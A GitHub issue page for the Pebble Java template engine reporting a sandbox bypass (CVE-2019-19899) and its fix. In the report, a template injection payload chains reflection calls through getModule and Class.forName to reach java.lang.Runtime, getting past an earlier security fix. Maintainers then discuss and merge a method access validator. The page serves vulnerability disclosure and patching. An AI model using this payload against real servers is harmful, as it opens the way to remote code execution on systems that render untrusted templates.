Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Unsafe Methods Bypass #493

Closed
ismai1337 opened this issue Dec 18, 2019 · 2 comments · Fixed by #511
Closed

Unsafe Methods Bypass #493

ismai1337 opened this issue Dec 18, 2019 · 2 comments · Fixed by #511

Comments

@ismai1337
Copy link

ismai1337 commented Dec 18, 2019

I was reading about https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/ and found a bypass to the fix in 454.

The following code will throw a security exception after the fix in 454:

{{(1).TYPE.getClass()}}

However you can still access getClass via the public static java.lang.Class java.lang.Class.forName(java.lang.Module,java.lang.String) signature:

{%set daInt = (1).TYPE.protectiondomain().getPermissions.elementsAsStream.findFirst().get.hashCode.TYPE.getModule %}

{{(1).TYPE.protectiondomain().getPermissions.elementsAsStream.findFirst().get.hashCode.TYPE.forName(daInt,'java.lang.Runtime') }}

Result:
class java.lang.Runtime

@NicoleG25
Copy link

Is there any plan to address this vulnerability?
Note that it appears that CVE-2019-19899 was assigned to this issue.

michalstodolny pushed a commit to michalstodolny/pebble that referenced this issue Jan 22, 2020
michalstodolny pushed a commit to michalstodolny/pebble that referenced this issue Jan 22, 2020
@michalstodolny
Copy link

Please review the pull request: #494
It forbids any access to Runtime or Class classes methods when allowUnsafeMethods is false.

michalstodolny pushed a commit to michalstodolny/pebble that referenced this issue Jan 24, 2020
ebussieres pushed a commit to michalstodolny/pebble that referenced this issue May 9, 2020
ebussieres pushed a commit to michalstodolny/pebble that referenced this issue May 9, 2020
@ebussieres ebussieres linked a pull request May 9, 2020 that will close this issue
ebussieres added a commit that referenced this issue May 16, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres added a commit that referenced this issue May 16, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres added a commit that referenced this issue May 16, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres added a commit that referenced this issue May 16, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres added a commit that referenced this issue May 18, 2020
…rovide a NoOp method access and a default one (#493)
ebussieres added a commit that referenced this issue May 21, 2020
#511)

* replace allowUnsafeMethod with a Method Access validator interface. Provide a NoOp method access and a default one (#493)

* Increase performance

* Add possibility to define a MethodAccessValidator bean for spring-boot app

* Remove possibility to turn sandbox off via template
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
3 participants